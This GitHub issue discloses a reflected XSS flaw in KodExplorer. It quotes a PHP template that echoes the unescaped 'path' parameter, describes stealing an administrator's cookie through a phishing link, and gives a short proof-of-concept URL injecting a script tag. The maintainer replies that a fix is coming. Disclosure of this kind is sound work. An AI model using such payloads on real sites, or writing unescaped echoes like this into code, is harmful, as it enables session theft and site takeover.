search

kalcaddle / KodExplorer

A web based file manager,web IDE / browser based code editor
https://kodcloud.com
6.26k stars 1.84k forks source link

New Reflected XSS in KodExplorer #482

Closed Eric1253 closed 3 years ago

Eric1253 commented 3 years ago

Analyse

file: app/template/api/view.html

G.shareInfo = {
    path:"<?php echo $_GET['path'];?>",
    name:"<?php echo get_path_this($_GET['path']);?>",
    mtime:0,
    size:0
}

No any safety check for variable(path), it direct to echo in the page. Attacker can use this bug to send fish email to administrator and catch the admin's cookie so that control the website.

Poc

http://example.com/index.php?explorer/fileView&path=</script><script>alert(1234)</script>

Screenshots

Local Website Test:

png

kalcaddle commented 3 years ago

thanks for your job. we will fixed it soon.